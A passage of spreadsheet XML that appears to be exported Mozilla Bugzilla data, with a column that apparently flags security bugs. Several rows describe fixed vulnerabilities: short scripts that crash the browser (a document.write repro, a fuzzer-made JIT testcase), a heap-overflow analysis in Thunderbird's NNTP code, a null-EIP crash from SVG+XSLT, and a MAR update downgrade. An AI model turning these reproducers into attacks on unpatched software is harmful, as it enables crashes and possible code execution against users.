          <t>Firefox 61</t>
        </is>
      </c>
      <c r="T1604" t="n">
        <v>1</v>
      </c>
      <c r="U1604" t="n">
        <v>0</v>
      </c>
      <c r="V1604" t="n">
        <v>17</v>
      </c>
      <c r="W1604" t="inlineStr">
        <is>
          <t>This page is controlled by the startup.homepage_welcome_url pref. Most sysadmins want to disable this page, or set it to a different one. The browser already supports disabling it by setting this pref to blank, so these are two policies request that can be implemented as one.</t>
        </is>
      </c>
      <c r="X1604" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1605">
      <c r="A1605" t="n">
        <v>608336</v>
      </c>
      <c r="B1605" t="inlineStr">
        <is>
          <t>2010-10-29 11:38:57 -0700</t>
        </is>
      </c>
      <c r="C1605" t="inlineStr">
        <is>
          <t>CRITICAL BUG when calling document.write()</t>
        </is>
      </c>
      <c r="D1605" t="inlineStr">
        <is>
          <t>2024-05-29 15:46:41 -0700</t>
        </is>
      </c>
      <c r="E1605" t="n">
        <v>1</v>
      </c>
      <c r="F1605" t="n">
        <v>1</v>
      </c>
      <c r="G1605" t="n">
        <v>3</v>
      </c>
      <c r="H1605" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1605" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1605" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1605" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1605" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1605" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1605" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1605" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1605" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1605" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1605" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1605" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1605" t="n">
        <v>1</v>
      </c>
      <c r="U1605" t="n">
        <v>0</v>
      </c>
      <c r="V1605" t="n">
        <v>21</v>
      </c>
      <c r="W1605" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 (.NET CLR 3.5.30729)
crashing after executing the following code from my test website with firefox 3.6.12:
&lt;script language="JavaScript"&gt;
var m = "6";
for (var i = 0; i &lt; 26; i++) {
	m = m + m;
}
document.write(m);
&lt;/script&gt;
Reproducible: Always
Steps to Reproduce:
1. create a file called crash.htm with the following content
&lt;script language="JavaScript"&gt;
var m = "6";
for (var i = 0; i &lt; 26; i++) {
	m = m + m;
}
document.write(m);
&lt;/script&gt;
2. doppelclick the file
Actual Results:  
0034a874 7684fdff 04000000 00000005 03d6e948 USP10!DoubleWideCharMappedString::DoubleWideCharMappedString+0x33
0034a954 76850f69 04000000 00000005 00000000 USP10!ScriptTokenize+0x4f
0034a990 76846248 0034af78 04000000 0034aa54 USP10!ScriptItemizeCommon+0x59
0034a9b4 555dc1a2 0034af78 04000000 00000005 USP10!ScriptItemize+0x38
WARNING: Stack unwind information not available. Following frames may be wrong.
0034aa6c 58348741 583e7ff8 00000000 0034ab28 xul!gfxTextRun::CopyGlyphDataFrom+0x5902
00000000 00000000 00000000 00000000 00000000 MOZCRT19!expand+0xa41</t>
        </is>
      </c>
      <c r="X1605" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1606">
      <c r="A1606" t="n">
        <v>1640737</v>
      </c>
      <c r="B1606" t="inlineStr">
        <is>
          <t>2020-05-25 13:50:18 -0700</t>
        </is>
      </c>
      <c r="C1606" t="inlineStr">
        <is>
          <t>Assertion failure: LoadElement instruction returned value with unexpected type, at js/src/jit/MacroAssembler.cpp:1862</t>
        </is>
      </c>
      <c r="D1606" t="inlineStr">
        <is>
          <t>2024-05-30 10:14:49 -0700</t>
        </is>
      </c>
      <c r="E1606" t="n">
        <v>1</v>
      </c>
      <c r="F1606" t="n">
        <v>1</v>
      </c>
      <c r="G1606" t="n">
        <v>3</v>
      </c>
      <c r="H1606" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1606" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1606" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1606" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1606" t="inlineStr">
        <is>
          <t>ARM64</t>
        </is>
      </c>
      <c r="M1606" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1606" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1606" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1606" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][sec-survey][adv-main78+][adv-esr68.10+]</t>
        </is>
      </c>
      <c r="Q1606" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1606" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1606" t="inlineStr">
        <is>
          <t>mozilla78</t>
        </is>
      </c>
      <c r="T1606" t="n">
        <v>1</v>
      </c>
      <c r="U1606" t="n">
        <v>0</v>
      </c>
      <c r="V1606" t="n">
        <v>28</v>
      </c>
      <c r="W1606" t="inlineStr">
        <is>
          <t>Our JITing produced ( run with --ion-eager --ion-offthread-compile=off) two crash files, both triggering the assert [here](https://searchfox.org/mozilla-central/source/js/src/jit/MacroAssembler.cpp#1862). Unfortunately, the stack trace wasn't very useful, so I'm not sure what the root cause is. (On x86 this doesn't crash.)
```
function main() {
let v2 = 0;
do {
    const v3 = v2 + 1;
    v2 = v3;
} while (v2 &lt; 7);
for (let v7 = 0; v7 &lt; 2; v7++) {
}
let v10 = 0;
while (v10 &lt; 8) {
    for (let v14 = 0; v14 &lt; 6; v14++) {
    }
    const v16 = [13.37,13.37,13.37];
    const v18 = [1337,1337];
    const v19 = {__proto__:v18,e:1337,valueOf:v16};
    for (let v23 = 0; v23 &lt; 100; v23++) {
        const v25 = [13.37,v19];
        const v26 = v25.flat();
    }
}
}
main();
gc();
```
```
function main() {
let v2 = 0;
do {
    const v3 = v2 + 1;
    v2 = v3;
} while (v2 &lt; 7);
for (let v7 = 0; v7 &lt; 2; v7++) {
}
let v10 = 0;
while (v10 &lt; 8) {
    for (let v14 = 0; v14 &lt; 6; v14++) {
    }
    const v16 = [13.37,13.37,13.37];
    const v18 = [1337,1337];
    const v19 = {__proto__:v18,e:1337,valueOf:v16};
    for (let v23 = 0; v23 &lt; 100; v23++) {
        const v25 = [13.37,v19];
        const v26 = v25.flat();
    }
}
}
main();
gc();
```</t>
        </is>
      </c>
      <c r="X1606" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1607">
      <c r="A1607" t="n">
        <v>218512</v>
      </c>
      <c r="B1607" t="inlineStr">
        <is>
          <t>2003-09-06 11:47:32 -0700</t>
        </is>
      </c>
      <c r="C1607" t="inlineStr">
        <is>
          <t>[FIXr]browser freezes (SCO kills Mozilla through TechNewsWorld (hang)) [@ PositionChildViews]</t>
        </is>
      </c>
      <c r="D1607" t="inlineStr">
        <is>
          <t>2004-04-08 08:34:40 -0700</t>
        </is>
      </c>
      <c r="E1607" t="n">
        <v>1</v>
      </c>
      <c r="F1607" t="n">
        <v>1</v>
      </c>
      <c r="G1607" t="n">
        <v>3</v>
      </c>
      <c r="H1607" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1607" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1607" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K1607" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1607" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1607" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1607" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1607" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1607" t="inlineStr"/>
      <c r="Q1607" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1607" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1607" t="inlineStr">
        <is>
          <t>mozilla1.6alpha</t>
        </is>
      </c>
      <c r="T1607" t="n">
        <v>1</v>
      </c>
      <c r="U1607" t="n">
        <v>2</v>
      </c>
      <c r="V1607" t="n">
        <v>65</v>
      </c>
      <c r="W1607" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624
Go to the article titled "SCO vs. IBM:  The Other Reality".
Page never finishes loading and CPU gets pegged at 99% by Mozilla.
Reproducible: Always
Steps to Reproduce:
1.  Go to http://www.technewsworld.com/perl/story/31479.html
2.  Wait
3.  Keep waiting
4.  Give up - Click the window close button and tell XP to kill it when it is
not responding.
Actual Results:  
Hang.  Some page text and boxes are displayed but nothing else.  Can't scroll.
Expected Results:  
Not hang
Date tested - September 6, 2003 - Ads may be the source.
Works in IE 6.</t>
        </is>
      </c>
      <c r="X1607" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1608">
      <c r="A1608" t="n">
        <v>425152</v>
      </c>
      <c r="B1608" t="inlineStr">
        <is>
          <t>2008-03-26 01:15:19 -0700</t>
        </is>
      </c>
      <c r="C1608" t="inlineStr">
        <is>
          <t>heap overflow when canceling usenet message in nsNNTPProtocol::DoCancel()</t>
        </is>
      </c>
      <c r="D1608" t="inlineStr">
        <is>
          <t>2008-09-28 11:24:01 -0700</t>
        </is>
      </c>
      <c r="E1608" t="n">
        <v>1</v>
      </c>
      <c r="F1608" t="n">
        <v>1</v>
      </c>
      <c r="G1608" t="n">
        <v>2</v>
      </c>
      <c r="H1608" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1608" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J1608" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1608" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1608" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1608" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1608" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1608" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1608" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1608" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1608" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1608" t="inlineStr">
        <is>
          <t>Thunderbird 3</t>
        </is>
      </c>
      <c r="T1608" t="n">
        <v>1</v>
      </c>
      <c r="U1608" t="n">
        <v>0</v>
      </c>
      <c r="V1608" t="n">
        <v>20</v>
      </c>
      <c r="W1608" t="inlineStr">
        <is>
          <t>this is not trivial to reproduce, but seems wrong by inspection:
http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/mailnews/news/src/nsNNTPProtocol.cpp&amp;rev=1.396
4255 mscott       1.1     L = PL_strlen (id);
...
4258                      other_random_headers = (char *) PR_Malloc (L + 20);
...
4339                      PL_strcpy (other_random_headers, "Control: cancel ");
4340                      PL_strcat (other_random_headers, id);
4341                      PL_strcat (other_random_headers, CRLF);
4342 sspitzer     1.73    if (distribution) {
4343 bienvenu     1.348     PL_strcat (other_random_headers, "Distribution: ");
4344 scott        1.386     PL_strcat (other_random_headers, distribution);
4345                        PL_strcat (other_random_headers, CRLF);
so |other_random_headers| is allocated strlen(id) + 20.
later |id| + stuff is copied.
later |distribition| may be appended yet distribution doesn't contribute to
the allocation size and this may lead to overflow.
even "Control: cancel Distribution: " is longer than 20</t>
        </is>
      </c>
      <c r="X1608" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1609">
      <c r="A1609" t="n">
        <v>1297361</v>
      </c>
      <c r="B1609" t="inlineStr">
        <is>
          <t>2016-08-23 05:20:14 -0700</t>
        </is>
      </c>
      <c r="C1609" t="inlineStr">
        <is>
          <t>JSON Viewer: use listeners instead of exporting postChromeMessage</t>
        </is>
      </c>
      <c r="D1609" t="inlineStr">
        <is>
          <t>2024-05-30 09:20:57 -0700</t>
        </is>
      </c>
      <c r="E1609" t="n">
        <v>1</v>
      </c>
      <c r="F1609" t="n">
        <v>1</v>
      </c>
      <c r="G1609" t="n">
        <v>3</v>
      </c>
      <c r="H1609" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1609" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J1609" t="inlineStr">
        <is>
          <t>JSON Viewer</t>
        </is>
      </c>
      <c r="K1609" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1609" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1609" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1609" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1609" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1609" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+][adv-esr45.7+]</t>
        </is>
      </c>
      <c r="Q1609" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1609" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1609" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T1609" t="n">
        <v>1</v>
      </c>
      <c r="U1609" t="n">
        <v>0</v>
      </c>
      <c r="V1609" t="n">
        <v>77</v>
      </c>
      <c r="W1609" t="inlineStr">
        <is>
          <t>Follow up for:
https://bugzilla.mozilla.org/show_bug.cgi?id=1295309#c26
JSON viewer uses `Cu.exportFunction` to export `postChromeMessage` method into content scope to create a communication channel (used for, copying &amp; saving JSON data and HTTP headers from the content).
This should be replaced by window listeners.
Honza</t>
        </is>
      </c>
      <c r="X1609" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1610">
      <c r="A1610" t="n">
        <v>830550</v>
      </c>
      <c r="B1610" t="inlineStr">
        <is>
          <t>2013-01-14 15:59:16 -0800</t>
        </is>
      </c>
      <c r="C1610" t="inlineStr">
        <is>
          <t>Show header error style on all PIN pages</t>
        </is>
      </c>
      <c r="D1610" t="inlineStr">
        <is>
          <t>2013-06-10 16:47:25 -0700</t>
        </is>
      </c>
      <c r="E1610" t="n">
        <v>1</v>
      </c>
      <c r="F1610" t="n">
        <v>1</v>
      </c>
      <c r="G1610" t="n">
        <v>6</v>
      </c>
      <c r="H1610" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1610" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1610" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K1610" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="L1610" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1610" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1610" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1610" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1610" t="inlineStr"/>
      <c r="Q1610" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1610" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1610" t="inlineStr">
        <is>
          <t>2013-01-17</t>
        </is>
      </c>
      <c r="T1610" t="n">
        <v>1</v>
      </c>
      <c r="U1610" t="n">
        <v>0</v>
      </c>
      <c r="V1610" t="n">
        <v>7</v>
      </c>
      <c r="W1610" t="inlineStr">
        <is>
          <t>This is an extension of prettification in bug 806419. All PIN templates should act like the verify-PIN template.
We have an includable template https://github.com/mozilla/webpay/blob/master/webpay/pin/templates/pin/includes/verify_form.html
but this is not used by pin/confirm.html, pin/create.html, pin/reset_confirm.html, or pin/reset_create.html</t>
        </is>
      </c>
      <c r="X1610" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1611">
      <c r="A1611" t="n">
        <v>347306</v>
      </c>
      <c r="B1611" t="inlineStr">
        <is>
          <t>2006-08-03 22:03:43 -0700</t>
        </is>
      </c>
      <c r="C1611" t="inlineStr">
        <is>
          <t>toSource of long functions seems O(n^2).</t>
        </is>
      </c>
      <c r="D1611" t="inlineStr">
        <is>
          <t>2007-02-05 03:24:33 -0800</t>
        </is>
      </c>
      <c r="E1611" t="n">
        <v>1</v>
      </c>
      <c r="F1611" t="n">
        <v>1</v>
      </c>
      <c r="G1611" t="n">
        <v>3</v>
      </c>
      <c r="H1611" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1611" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1611" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1611" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1611" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1611" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1611" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1611" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1611" t="inlineStr"/>
      <c r="Q1611" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1611" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1611" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T1611" t="n">
        <v>1</v>
      </c>
      <c r="U1611" t="n">
        <v>0</v>
      </c>
      <c r="V1611" t="n">
        <v>35</v>
      </c>
      <c r="W1611" t="inlineStr">
        <is>
          <t>This testcase demonstrates that toSource of long functions seems O(n^2) in time.  It does not use an excessive amount of memory.
Size: 10, Time: 0 ms
Size: 100, Time: 4 ms
Size: 1000, Time: 377 ms
Size: 10000, Time: 33985 ms</t>
        </is>
      </c>
      <c r="X1611" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1612">
      <c r="A1612" t="n">
        <v>289999</v>
      </c>
      <c r="B1612" t="inlineStr">
        <is>
          <t>2005-04-11 20:14:57 -0700</t>
        </is>
      </c>
      <c r="C1612" t="inlineStr">
        <is>
          <t>$bad_names hash in index-renaming code throws an "odd number of elements" warning</t>
        </is>
      </c>
      <c r="D1612" t="inlineStr">
        <is>
          <t>2005-04-14 15:42:59 -0700</t>
        </is>
      </c>
      <c r="E1612" t="n">
        <v>1</v>
      </c>
      <c r="F1612" t="n">
        <v>1</v>
      </c>
      <c r="G1612" t="n">
        <v>4</v>
      </c>
      <c r="H1612" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1612" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1612" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K1612" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L1612" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1612" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1612" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1612" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1612" t="inlineStr"/>
      <c r="Q1612" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1612" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S1612" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T1612" t="n">
        <v>1</v>
      </c>
      <c r="U1612" t="n">
        <v>0</v>
      </c>
      <c r="V1612" t="n">
        <v>6</v>
      </c>
      <c r="W1612" t="inlineStr">
        <is>
          <t>When I was coding for bug 78276, I realized that instead of having the
$bad_names hash keys point to a list, they need to point to an arrayref. It
seems like perl is interpreting my list as additional key/value pairs.</t>
        </is>
      </c>
      <c r="X1612" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1613">
      <c r="A1613" t="n">
        <v>708688</v>
      </c>
      <c r="B1613" t="inlineStr">
        <is>
          <t>2011-12-08 09:49:02 -0800</t>
        </is>
      </c>
      <c r="C1613" t="inlineStr">
        <is>
          <t>Signed MAR files are not version checked and can be used to downgrade an install</t>
        </is>
      </c>
      <c r="D1613" t="inlineStr">
        <is>
          <t>2016-08-26 13:16:43 -0700</t>
        </is>
      </c>
      <c r="E1613" t="n">
        <v>1</v>
      </c>
      <c r="F1613" t="n">
        <v>1</v>
      </c>
      <c r="G1613" t="n">
        <v>3</v>
      </c>
      <c r="H1613" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1613" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J1613" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K1613" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1613" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1613" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1613" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1613" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1613" t="inlineStr">
        <is>
          <t>[sg:dupe 708690][advisory-tracking+][qa+:simonab]</t>
        </is>
      </c>
      <c r="Q1613" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1613" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1613" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T1613" t="n">
        <v>1</v>
      </c>
      <c r="U1613" t="n">
        <v>0</v>
      </c>
      <c r="V1613" t="n">
        <v>58</v>
      </c>
      <c r="W1613" t="inlineStr">
        <is>
          <t>Although MAR files will be signed as part of bug 699700, the version of the application is not part of the MAR file itself. This means a legitimately signed but older MAR file can be used to downgrade an install of an application. There are other checks around MAR files - a SHA-512 hash of the MAR is downloaded over SSL and used to verify the MAR file downloaded over http was not tampered with. Circumventing this protection would require compromising the update server's SSL session via either attacking the server and its private key directly, or forging/hijacking a cert that would be trusted for the SSL session.</t>
        </is>
      </c>
      <c r="X1613" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1614">
      <c r="A1614" t="n">
        <v>494496</v>
      </c>
      <c r="B1614" t="inlineStr">
        <is>
          <t>2009-05-22 15:16:36 -0700</t>
        </is>
      </c>
      <c r="C1614" t="inlineStr">
        <is>
          <t>[Discoverability] Organize Drop Down Admin Menus to User Permissions</t>
        </is>
      </c>
      <c r="D1614" t="inlineStr">
        <is>
          <t>2009-07-20 10:35:41 -0700</t>
        </is>
      </c>
      <c r="E1614" t="n">
        <v>1</v>
      </c>
      <c r="F1614" t="n">
        <v>1</v>
      </c>
      <c r="G1614" t="n">
        <v>5</v>
      </c>
      <c r="H1614" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1614" t="inlineStr">
        <is>
          <t>quality.mozilla.org</t>
        </is>
      </c>
      <c r="J1614" t="inlineStr">
        <is>
          <t>Website</t>
        </is>
      </c>
      <c r="K1614" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1614" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1614" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1614" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1614" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1614" t="inlineStr"/>
      <c r="Q1614" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1614" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1614" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1614" t="n">
        <v>1</v>
      </c>
      <c r="U1614" t="n">
        <v>0</v>
      </c>
      <c r="V1614" t="n">
        <v>6</v>
      </c>
      <c r="W1614" t="inlineStr">
        <is>
          <t>The following should be visible in the "Create" and "My Account" menus
Right now, the drop down menus show all options available to every user and admin, but not all users can create content on QMO. What ends up happening is that these users will click on a link to create content and end up with an "Access Denied" page which will degrade their experience with the site :(.
To remove the risk of confusing a user, we should really only show what options they have available.
Logged-in user that is not an admin:
Create: Forum topics
My Account: Edit Account, Subscriptions
Logged-in admin: 
Create: current implementation
My Account: current implementation</t>
        </is>
      </c>
      <c r="X1614" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1615">
      <c r="A1615" t="n">
        <v>702466</v>
      </c>
      <c r="B1615" t="inlineStr">
        <is>
          <t>2011-11-14 15:41:40 -0800</t>
        </is>
      </c>
      <c r="C1615" t="inlineStr">
        <is>
          <t>Crash with EIP=0x00000000 when parsing SVG+XSLT</t>
        </is>
      </c>
      <c r="D1615" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:54 -0700</t>
        </is>
      </c>
      <c r="E1615" t="n">
        <v>1</v>
      </c>
      <c r="F1615" t="n">
        <v>1</v>
      </c>
      <c r="G1615" t="n">
        <v>3</v>
      </c>
      <c r="H1615" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1615" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1615" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K1615" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1615" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1615" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1615" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1615" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1615" t="inlineStr">
        <is>
          <t>[sg:critical][see comment 6 - comment 9 for what's busted][qa!]</t>
        </is>
      </c>
      <c r="Q1615" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1615" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1615" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1615" t="n">
        <v>1</v>
      </c>
      <c r="U1615" t="n">
        <v>0</v>
      </c>
      <c r="V1615" t="n">
        <v>58</v>
      </c>
      <c r="W1615" t="inlineStr">
        <is>
          <t>Created attachment 574456
Minimized SVG file (load from local file to test)
When opening a specific SVG file (created by a mutation fuzzer), the browser will crash with EIP=0x00000000. This was tested on Firefox 3.6.24 / Ubuntu 10.04 LTS and Firefox 8.0 / WinXP SP3.
Under Linux : a call to *(%eax) at  _ZN20txStylesheetCompiler15flushCharactersEv+26 will set EIP to 0x000000. An annotated gdb session is attached. A similar behavior is constated on Firefox 8.0 (a screenshot of windbg !exploitable is attached too).</t>
        </is>
      </c>
      <c r="X1615" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1616">
      <c r="A1616" t="n">
        <v>856154</v>
      </c>
      <c r="B1616" t="inlineStr">
        <is>
          <t>2013-03-29 13:35:38 -0700</t>
        </is>
      </c>
      <c r="C1616" t="inlineStr">
        <is>
          <t>Marking themes as duplicate not working</t>
        </is>
      </c>
      <c r="D1616" t="inlineStr">
        <is>
          <t>2016-02-04 14:47:12 -0800</t>
        </is>
      </c>
      <c r="E1616" t="n">
        <v>1</v>
      </c>
      <c r="F1616" t="n">
        <v>1</v>
      </c>
      <c r="G1616" t="n">
        <v>6</v>
      </c>
      <c r="H1616" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1616" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1616" t="inlineStr">
        <is>
          <t>Admin/Editor Tools</t>
        </is>
      </c>
      <c r="K1616" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1616" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1616" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
